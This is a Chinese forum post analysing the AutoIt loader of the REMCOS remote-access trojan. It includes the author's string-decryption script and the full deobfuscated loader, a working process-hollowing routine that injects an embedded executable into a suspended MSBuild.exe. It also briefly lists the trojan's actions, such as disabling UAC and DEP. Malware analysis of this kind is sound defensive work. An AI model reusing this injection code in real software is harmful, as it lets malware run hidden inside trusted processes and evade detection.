REMCOS v1.7 Pro远控木马简要分析 - 〖系统安全〗

z3960

级别: FLY版主

发帖: 786303

飞翔币: 211574

威望: 215717

飞扬币: 2615486

信誉值: 8

只看楼主更多操作 0 发表于: 2020-12-06

REMCOS v1.7 Pro远控木马简要分析

1.脚本分析

查壳，发现是Autoit的脚本语言

下载autoit-v3-setup.exe和exe2aut.exe,使用Exe2Aut反编译

反编译结果可以看出，脚本进行了混淆，现在需要去混淆。
第一次是看了这个链接去混淆教程，被欺骗了感情，踩了下面的坑，但是还好，得到了这两个工具。

先试着编译一下，发现有语法错误，通过_换行后可以成功编译通过，可能是编译器的bug，一行不能太长。

重新再次exe2aut ,发现脚本里的编译器居然不会优化一下。呜呜呜。
看来只能用脚本战胜脚本了。
上Autoit脚本，这个脚本一次只能处理单行文本中的函数替换，改改路径，多运行几次，就可以替换完，如果有人写出了更好的脚本，希望贴到楼下学习一下。#include <FileConstants.au3>#include <MsgBoxConstants.au3>#include <WinAPIFiles.au3>#include <StringConstants.au3>#include <Debug.au3>;MsgBox($MB_OK,"SRE Example 1 Result",StringRegExp("text",'test'));MsgBox($MB_OK,"SRE Example 2 Result",StringRegExp("test",'te[sx]t'));MsgBox($MB_OK, "SRE Example 3 Result", StringRegExp("text", 't{1}e{1}[sx]{1}t{1}'));MsgBox($MB_OK, "SRE Example 3 Result", StringRegExp("aaaabbbbcccc", 'b{4}'))#csLocal $aResult = StringRegExp("This is a test example", '(test)', $STR_REGEXPARRAYMATCH)If Not home.php?mod=space&uid=209627 Then MsgBox($MB_OK, "SRE Example 4 Result", $aResult[0])EndIf$aResult = StringRegExp("This is a test example", '(te)(st)', $STR_REGEXPARRAYMATCH)If Not @error Then MsgBox($MB_OK, "SRE Example 4 Result", $aResult[0] & "," & $aResult[1])EndIfLocal $aResult = StringRegExp("There were 18 sheets left in the ream of paper.", _ '([0-9]{1,3})', $STR_REGEXPARRAYMATCH)If Not @error Then MsgBox($MB_OK, "SRE Example 5 Result", $aResult[0])EndIf#ce#csLocal $aResult = StringRegExp("You used 36 of 279 pages.", '([0-9]{1,3})(?: pages)', $STR_REGEXPARRAYMATCH)If Not @error Then MsgBox($MB_OK, "SRE Example 6 Result", $aResult[0])EndIf#ce$k = 129692322Example()Func Example() _DebugSetup("Check bug") Local $hFileOpen = FileOpen("K:MalwareVirus14.au3",$FO_READ) Local $hFileWrite = FileOpen("K:MalwareVirus15.au3",$FO_OVERWRITE) If $hFileOpen = -1 Then MsgBox($MB_SYSTEMMODAL,"","An error occurred when reading the file.") Return False EndIf Local $line = 0 Local $count = 0 Do Local $sFileRead = FileReadLine($hFileOpen,$line) if(@error = -1) Then ExitLoop EndIf ;_DebugOut("Line: " & $line) $line +=1 ;MsgBox($MB_OK,"",$sFileRead) ;查找开始 Local $start = 1 Local $pos = StringInStr($sFileRead,"d9wb1uc2qm4u") ;_DebugOut($pos) ;_DebugOut("End: " & $end) Local $code = $sFileRead If $pos <> 0 Then $count+=1 Local $startPos = StringInStr($sFileRead,"d9wb1uc2qm4u(""") Local $endPos = StringInStr($sFileRead,", $b1dm2hp2tf8t") Local $text = StringMid($sFileRead,$startPos+14,$endPos-$startPos-15) Local $plaintText = decryptString($text,$k) Local $searchText = "d9wb1uc2qm4u(""" & $text & """" & ", $b1dm2hp2tf8t)" ;_DebugOut($searchText) $plaintText ="""" & $plaintText & """" $code = StringReplace($sFileRead,$searchText,$plaintText) _DebugOut($code) ;_DebugOut($plaintText) EndIf FileWriteLine($hFileWrite,$code) Until(False) _DebugOut($count) FileClose($hFileOpen) Return FalseEndFuncFunc decryptString($cipherText, $key) $cipherText = BinaryToString("0x" & $cipherText) $plaintText = "" $tmpText = "" For $i = 1 To StringLen($cipherText) $text = StringMid($cipherText, $i, 1) If StringIsInt($text) Then $tmpText &= $text Else $plaintText &= Chr($tmpText - $key) $tmpText = "" EndIf Next Return $plaintTextEndFunc
还原的脚本后，分析脚本，变量重命名后的结果#NoTrayIcon$key = 129692322$scriptDir = @ScriptDir$scriptName = @ScriptName$scriptPath = $scriptDir & "" & $scriptNamegetPE_HEX()$MSBuildPath = @WindowsDir & "Microsoft.NETFrameworkv2.0.50727MSBuild.exe"CreateMalwarelProcess($peHex, "", $MSBuildPath)Func CreateMalwarelProcess($pe, $lpCommandLine = "", $lpApplicationName = "") Local $bRun64_autoit = @AutoItX64 Local $peBinary = Binary($pe) Local $bytesArray = DllStructCreate("BYTE[" & BinaryLen($peBinary) & "]") DllStructSetData($bytesArray, 1, $peBinary) Local $pPE = DllStructGetPtr($bytesArray) Local $lpStartupInfo = DllStructCreate("DWORD CBSIZE;" & _ "PTR RESERVED;" & _ "PTR DESKTOP;" & _ "PTR TITLE;" & _ "DWORD X;" & _ "DWORD Y;" & _ "DWORD XSIZE;" & _ "DWORD YSIZE;" & _ "DWORD XCOUNTCHARS;" & _ "DWORD YCOUNTCHARS;" & _ "DWORD FILLATTRIBUTE;" & _ "DWORD FLAGS;" & _ "WORD SHOWWINDOW;" & _ "WORD RESERVED2;" & _ "PTR RESERVED2;" & _ "PTR HSTDINPUT;" & _ "PTR HSTDOUTPUT;" & _ "PTR HSTDERROR") Local $lpProcessInformation = DllStructCreate("PTR PROCESS;" & "PTR THREAD;" & "DWORD PROCESSID;" & "DWORD THREADID") ;创建挂起的进程 Local $aResult = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $lpApplicationName, "WSTR", $lpCommandLine, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($lpStartupInfo), "PTR", DllStructGetPtr($lpProcessInformation)) If @error OR NOT $aResult[0] Then Return SetError(1, 0, 0) Local $hProcess = DllStructGetData($lpProcessInformation, "PROCESS") Local $hThread = DllStructGetData($lpProcessInformation, "THREAD") If $bRun64_autoit AND Call_IsWow64Process($hProcess) Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(2, 0, 0) EndIf Local $OSArchType, $ctx If $bRun64_autoit Then If @OSArch = "X64" Then $OSArchType = 2 $ctx = DllStructCreate("ALIGN 16; UINT64 P1HOME; UINT64 P2HOME; " & _ "UINT64 P3HOME; UINT64 P4HOME; UINT64 P5HOME; UINT64 P6HOME;" & _ "DWORD CONTEXTFLAGS; DWORD MXCSR;" & _ "WORD SEGCS; WORD " & _ "SEGDS; WORD SEGES; WORD SEGFS; WORD " & _ "SEGGS; WORD SEGSS; DWORD EFLAGS;" & _ "UINT64 DR0; UINT64 DR1; UINT64 DR2; " & _ "UINT64 DR3; UINT64 DR6; UINT64 DR7;" & "UINT64 RAX; UINT64 RCX; UINT64 RDX; UINT64 RBX; UINT64 RSP; " & _ "UINT64 RBP; UINT64 RSI; UINT64 RDI; UINT64 R8; " & _ "UINT64 R9; UINT64 R10; UINT64 R11; UINT64 R12; " & _ "UINT64 R13; UINT64 R14; UINT64 R15;" & "UINT64 RIP;" & _ "UINT64 HEADER[4]; " & _ "UINT64 LEGACY[16]; UINT64 XMM0[2]; " & "UINT64 XMM1[2]; UINT64 XMM2[2]; " & _ "UINT64 XMM3[2]; UINT64 XMM4[2]; " & "UINT64 XMM5[2]; UINT64 XMM6[2]; " & "UINT64 XMM7[2]; UINT64 XMM8[2]; " & _ "UINT64 XMM9[2]; UINT64 XMM10[2]; " & "UINT64 XMM11[2]; UINT64 XMM12[2]; UINT64 XMM13[2]; " & _ "UINT64 XMM14[2]; UINT64 XMM15[2];" & "UINT64 VECTORREGISTER[52]; UINT64 VECTORCONTROL;" & "UINT64 DEBUGCONTROL; UINT64 LASTBRANCHTORIP; " & "UINT64 LASTBRANCHFROMRIP; UINT64 LASTEXCEPTIONTORIP; " & _ "UINT64 LASTEXCEPTIONFROMRIP") Else $OSArchType = 3 DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(102, 0, 0) EndIf Else $OSArchType = 1 $ctx = DllStructCreate("DWORD CONTEXTFLAGS;" & _ "DWORD DR0; DWORD DR1; DWORD DR2; DWORD DR3; DWORD DR6; DWORD DR7;" & "DWORD CONTROLWORD; DWORD STATUSWORD; " & _ "DWORD TAGWORD; DWORD ERROROFFSET; " & _ "DWORD ERRORSELECTOR; DWORD DATAOFFSET; DWORD DATASELECTOR; " & _ "BYTE REGISTERAREA[80]; DWORD CR0NPXSTATE;" & _ "DWORD SEGGS; DWORD SEGFS; DWORD SEGES; DWORD SEGDS;" & "DWORD EDI; DWORD ESI; DWORD EBX; DWORD EDX; DWORD ECX; DWORD EAX;" & "DWORD EBP; DWORD EIP; DWORD SEGCS; " & _ "DWORD EFLAGS; DWORD ESP; DWORD SEGSS;" & "BYTE EXTENDEDREGISTERS[512]") EndIf Local $ctxFlags Switch $OSArchType Case 1 $ctxFlags = 65543 Case 2 $ctxFlags = 1048583 Case 3 $ctxFlags = 524327 EndSwitch DllStructSetData($ctx, "CONTEXTFLAGS", $ctxFlags) $aResult = DllCall("KERNEL32.DLL", "BOOL", "GetThreadContext", "HANDLE", $hThread, "PTR", DllStructGetPtr($ctx)) If @error OR NOT $aResult[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(3, 0, 0) EndIf Local $pReg Switch $OSArchType Case 1 $pReg = DllStructGetData($ctx, "EBX") Case 2 $pReg = DllStructGetData($ctx, "RDX") Case 3 EndSwitch Local $dosHeader = DllStructCreate("CHAR MAGIC[2];" & "WORD BYTESONLASTPAGE;" & "WORD PAGES;" & "WORD RELOCATIONS;" & _ "WORD SIZEOFHEADER;" & "WORD MINIMUMEXTRA;" & _ "WORD MAXIMUMEXTRA;" & _ "WORD SS;" & "WORD SP;" & "WORD CHECKSUM;" & "WORD IP;" & "WORD CS;" & "WORD RELOCATION;" & "WORD OVERLAY;" & "CHAR RESERVED[8];" & "WORD OEMIDENTIFIER;" & "WORD OEMINFORMATION;" & "CHAR RESERVED2[20];" & "DWORD ADDRESSOFNEWEXEHEADER", $pPE) Local $pFileBase = $pPE $pPE += DllStructGetData($dosHeader, "ADDRESSOFNEWEXEHEADER") Local $e_magic = DllStructGetData($dosHeader, "MAGIC") If NOT ($e_magic == "MZ") Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(4, 0, 0) EndIf Local $signature = DllStructCreate("DWORD SIGNATURE", $pPE) $pPE += 4 If DllStructGetData($signature, "SIGNATURE") <> 17744 Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(5, 0, 0) EndIf Local $optHeader = DllStructCreate("WORD MACHINE;" & "WORD NUMBEROFSECTIONS;" & "DWORD TIMEDATESTAMP;" & "DWORD POINTERTOSYMBOLTABLE;" & "DWORD NUMBEROFSYMBOLS;" & "WORD SIZEOFOPTIONALHEADER;" & "WORD CHARACTERISTICS", $pPE) Local $sectionCount = DllStructGetData($optHeader, "NUMBEROFSECTIONS") $pPE += 20 Local $pMagic = DllStructCreate("WORD MAGIC;", $pPE) Local $magic = DllStructGetData($pMagic, 1) Local $pOptHeader If $magic = 267 Then If $bRun64_autoit Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(6, 0, 0) EndIf $pOptHeader = DllStructCreate("WORD MAGIC;" & _ "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & _ "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & _ "DWORD SIZEOFUNINITIALIZEDDATA;" & _ "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "DWORD BASEOFDATA;" & _ "DWORD IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & _ "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & _ "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & _ "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONrvaLUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & _ "WORD DLLCHARACTERISTICS;" & "DWORD SIZEOFSTACKRESERVE;" & "DWORD SIZEOFSTACKCOMMIT;" & "DWORD SIZEOFHEAPRESERVE;" & "DWORD SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRrvaANDSIZES", $pPE) $pPE += 96 ElseIf $magic = 523 Then If NOT $bRun64_autoit Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(6, 0, 0) EndIf $pOptHeader = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & _ "UINT64 IMAGEBASE;" & _ "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & _ "WORD MINORSUBSYSTEMVERSION;" & _ "DWORD WIN32VERSIONrvaLUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & _ "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "UINT64 SIZEOFSTACKRESERVE;" & "UINT64 SIZEOFSTACKCOMMIT;" & "UINT64 SIZEOFHEAPRESERVE;" & "UINT64 SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRrvaANDSIZES", $pPE) $pPE += 112 Else DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(6, 0, 0) EndIf Local $entryPoint = DllStructGetData($pOptHeader, "ADDRESSOFENTRYPOINT") Local $fileHeaderSize = DllStructGetData($pOptHeader, "SIZEOFHEADERS") Local $imageBase = DllStructGetData($pOptHeader, "IMAGEBASE") Local $imageSize = DllStructGetData($pOptHeader, "SIZEOFIMAGE") $pPE += 8 $pPE += 8 $pPE += 24 Local $dataDirectory = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZE", $pPE) Local $rva = DllStructGetData($dataDirectory, "VIRTUALADDRESS") Local $size = DllStructGetData($dataDirectory, "SIZE") Local $bExistDir If $rva AND $size Then $bExistDir = True $pPE += 88 Local $bSuccess Local $pMem If $bExistDir Then $pMem = AllocMem($hProcess, $imageSize) If @error Then $pMem = Call_VirtualAllocEx($hProcess, $imageBase, $imageSize) If @error Then Call_NtUnmapViewOfSection($hProcess, $imageBase) $pMem = Call_VirtualAllocEx($hProcess, $imageBase, $imageSize) If @error Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(101, 1, 0) EndIf EndIf EndIf $bSuccess = True Else $pMem = Call_VirtualAllocEx($hProcess, $imageBase, $imageSize) If @error Then Call_NtUnmapViewOfSection($hProcess, $imageBase) $pMem = Call_VirtualAllocEx($hProcess, $imageBase, $imageSize) If @error Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(101, 0, 0) EndIf EndIf EndIf DllStructSetData($pOptHeader, "IMAGEBASE", $pMem) Local $pImageArray = DllStructCreate("BYTE[" & $imageSize & "]") Local $pBytes = DllStructGetPtr($pImageArray) Local $pFileHeaderArray = DllStructCreate("BYTE[" & $fileHeaderSize & "]", $pFileBase) DllStructSetData($pImageArray, 1, DllStructGetData($pFileHeaderArray, 1)) Local $secHeader Local $sizeOfRawData, $pSecHeader Local $secRVA, $misc Local $pSection For $i = 1 To $sectionCount $secHeader = DllStructCreate("CHAR NAME[8];" & _ "DWORD UNIONOFVIRTUALSIZEANDPHYSICALADDRESS;" & "DWORD VIRTUALADDRESS;" & "DWORD SIZEOFRAWDATA;" & _ "DWORD POINTERTORAWDATA;" & "DWORD POINTERTORELOCATIONS;" & "DWORD POINTERTOLINENUMBERS;" & "WORD NUMBEROFRELOCATIONS;" & "WORD NUMBEROFLINENUMBERS;" & "DWORD CHARACTERISTICS", $pPE) $sizeOfRawData = DllStructGetData($secHeader, "SIZEOFRAWDATA") $pSecHeader = $pFileBase + DllStructGetData($secHeader, "POINTERTORAWDATA") $secRVA = DllStructGetData($secHeader, "VIRTUALADDRESS") $misc = DllStructGetData($secHeader, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS") If $misc AND $misc < $sizeOfRawData Then $sizeOfRawData = $misc If $sizeOfRawData Then DllStructSetData(DllStructCreate("BYTE[" & $sizeOfRawData & "]", $pBytes + $secRVA), 1, DllStructGetData(DllStructCreate("BYTE[" & $sizeOfRawData & "]", $pSecHeader), 1)) EndIf If $bSuccess Then If $secRVA <= $rva AND $secRVA + $sizeOfRawData > $rva Then $pSection = DllStructCreate("BYTE[" & $size & "]", $pSecHeader + ($rva - $secRVA)) EndIf EndIf $pPE += 40 Next If $bSuccess Then fixupRelocation($pBytes, $pSection, $pMem, $imageBase, $magic = 523) $aResult = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hProcess, "PTR", $pMem, "PTR", $pBytes, "DWORD_PTR", $imageSize, "DWORD_PTR*", 0) If @error OR NOT $aResult[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(7, 0, 0) EndIf Local $pPEB = DllStructCreate("BYTE INHERITEDADDRESSSPACE;" & "BYTE READIMAGEFILEEXECOPTIONS;" & _ "BYTE BEINGDEBUGGED;" & "BYTE SPARE;" & _ "PTR MUTANT;" & "PTR IMAGEBASEADDRESS;" & "PTR LOADERDATA;" & "PTR PROCESSPARAMETERS;" & _ "PTR SUBSYSTEMDATA;" & "PTR PROCESSHEAP;" & "PTR FASTPEBLOCK;" & _ "PTR FASTPEBLOCKROUTINE;" & "PTR FASTPEBUNLOCKROUTINE;" & "DWORD ENVIRONMENTUPDATECOUNT;" & _ "PTR KERNELCALLBACKTABLE;" & "PTR EVENTLOGSECTION;" & "PTR EVENTLOG;" & "PTR FREELIST;" & "DWORD TLSEXPANSIONCOUNTER;" & _ "PTR TLSBITMAP;" & "DWORD TLSBITMAPBITS[2];" & "PTR READONLYSHAREDMEMORYBASE;" & "PTR READONLYSHAREDMEMORYHEAP;" & "PTR READONLYSTATICSERVERDATA;" & "PTR ANSICODEPAGEDATA;" & _ "PTR OEMCODEPAGEDATA;" & "PTR UNICODECASETABLEDATA;" & "DWORD NUMBEROFPROCESSORS;" & "DWORD NTGLOBALFLAG;" & "BYTE SPARE2[4];" & _ "INT64 CRITICALSECTIONTIMEOUT;" & "DWORD HEAPSEGMENTRESERVE;" & _ "DWORD HEAPSEGMENTCOMMIT;" & "DWORD HEAPDECOMMITTOTALFREETHRESHOLD;" & "DWORD HEAPDECOMMITFREEBLOCKTHRESHOLD;" & "DWORD NUMBEROFHEAPS;" & "DWORD MAXIMUMNUMBEROFHEAPS;" & _ "PTR PROCESSHEAPS;" & "PTR GDISHAREDHANDLETABLE;" & "PTR PROCESSSTARTERHELPER;" & "PTR GDIDCATTRIBUTELIST;" & _ "PTR LOADERLOCK;" & "DWORD OSMAJORVERSION;" & "DWORD OSMINORVERSION;" & "DWORD OSBUILDNUMBER;" & "DWORD OSPLATFORMID;" & "DWORD IMAGESUBSYSTEM;" & _ "DWORD IMAGESUBSYSTEMMAJORVERSION;" & "DWORD IMAGESUBSYSTEMMINORVERSION;" & "DWORD GDIHANDLEBUFFER[34];" & _ "DWORD POSTPROCESSINITROUTINE;" & "DWORD TLSEXPANSIONBITMAP;" & "BYTE TLSEXPANSIONBITMAPBITS[128];" & "DWORD SESSIONID") $aResult = DllCall("KERNEL32.DLL", "BOOL", "ReadProcessMemory", "PTR", $hProcess, "PTR", $pReg, "PTR", DllStructGetPtr($pPEB), "DWORD_PTR", DllStructGetSize($pPEB), "DWORD_PTR*", 0) If @error OR NOT $aResult[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(8, 0, 0) EndIf DllStructSetData($pPEB, "IMAGEBASEADDRESS", $pMem) $aResult = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hProcess, "PTR", $pReg, "PTR", DllStructGetPtr($pPEB), "DWORD_PTR", DllStructGetSize($pPEB), "DWORD_PTR*", 0) If @error OR NOT $aResult[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(9, 0, 0) EndIf Switch $OSArchType Case 1 DllStructSetData($ctx, "EAX", $pMem + $entryPoint) Case 2 DllStructSetData($ctx, "RCX", $pMem + $entryPoint) Case 3 EndSwitch $aResult = DllCall("KERNEL32.DLL", "BOOL", "SetThreadContext", "HANDLE", $hThread, "PTR", DllStructGetPtr($ctx)) If @error OR NOT $aResult[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(10, 0, 0) EndIf $aResult = DllCall("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $hThread) If @error OR $aResult[0] = -1 Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hProcess, "DWORD", 0) Return SetError(11, 0, 0) EndIf DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hProcess) DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hThread) Return DllStructGetData($lpProcessInformation, "PROCESSID")EndFuncFunc fixupRelocation($pBytes, $pSec, $pMemImageBase, $pFileImageBase, $IsPe32) Local $offset = $pMemImageBase - $pFileImageBase Local $dwTotalSize = DllStructGetSize($pSec) Local $sectionItem = DllStructGetPtr($pSec) Local $pBaseRelocation, $size Local $secRVA, $sizeOfBlock, $itemSum Local $itemSumBlock, $item, $pRVA Local $relType = 3 + 7 * $IsPe32 While $size < $dwTotalSize $pBaseRelocation = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZEOFBLOCK", $sectionItem + $size) $secRVA = DllStructGetData($pBaseRelocation, "VIRTUALADDRESS") $sizeOfBlock = DllStructGetData($pBaseRelocation, "SIZEOFBLOCK") $itemSum = ($sizeOfBlock - 8) / 2 $itemSumBlock = DllStructCreate("WORD[" & $itemSum & "]", DllStructGetPtr($pBaseRelocation) + 8) For $i = 1 To $itemSum $item = DllStructGetData($itemSumBlock, 1, $i) If BitShift($item, 12) = $relType Then $pRVA = DllStructCreate("PTR", $pBytes + $secRVA + BitAND($item, 4095)) DllStructSetData($pRVA, 1, DllStructGetData($pRVA, 1) + $offset) EndIf Next $size += $sizeOfBlock WEnd Return 1EndFuncFunc Call_VirtualAllocEx($hProcess, $lpAddress, $dwSize) Local $aResult = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hProcess, "PTR", $lpAddress, "DWORD_PTR", $dwSize, "DWORD", 4096, "DWORD", 64) If @error OR NOT $aResult[0] Then $aResult = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hProcess, "PTR", $lpAddress, "DWORD_PTR", $dwSize, "DWORD", 12288, "DWORD", 64) If @error OR NOT $aResult[0] Then Return SetError(1, 0, 0) EndIf Return $aResult[0]EndFunc;申请MEM_COMMENT|MEM_RESERVE属性的内存Func AllocMem($hProcess, $dwSize) Local $aResult = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hProcess, "PTR", 0, "DWORD_PTR", $dwSize, "DWORD", 12288, "DWORD", 64) If @error OR NOT $aResult[0] Then Return SetError(1, 0, 0) Return $aResult[0]EndFuncFunc Call_NtUnmapViewOfSection($hProcess, $lpAddress) DllCall("NTDLL.DLL", "INT", "NtUnmapViewOfSection", "PTR", $hProcess, "PTR", $lpAddress) If @error Then Return SetError(1, 0, 0) Return 1EndFuncFunc Call_IsWow64Process($hProcess) Local $aResult = DllCall("KERNEL32.DLL", "BOOL", "IsWow64Process", "HANDLE", $hProcess, "BOOL*", 0) If @error OR NOT $aResult[0] Then Return SetError(1, 0, 0) Return $aResult[2]EndFuncFunc decryptString($cipherText, $k) $cipherText = BinaryToString("0x" & $cipherText) $plaintText = "" $tmpText = "" For $i = 1 To StringLen($cipherText) $text = StringMid($cipherText, $i, 1) If StringIsInt($text) Then $tmpText &= $text Else $plaintText &= Chr($tmpText - $k) $tmpText = "" EndIf Next Return $plaintTextEndFuncFunc getPE_HEX() Global $peHex = "0x" $peHex &= "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000" $peHex &= "00000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F74206265" ;这里省略了很多行，因为这个pe文件属实有点大，太占空间了。 $peHex &= "494E475858504144"EndFunc
大致流程就是傀儡进程的惯用手法。

2.远控进程简要分析

创建单例，获取计算机系统版本信息，写注册表，判断用户权限，禁用UAC，DEP,获取计算机名字等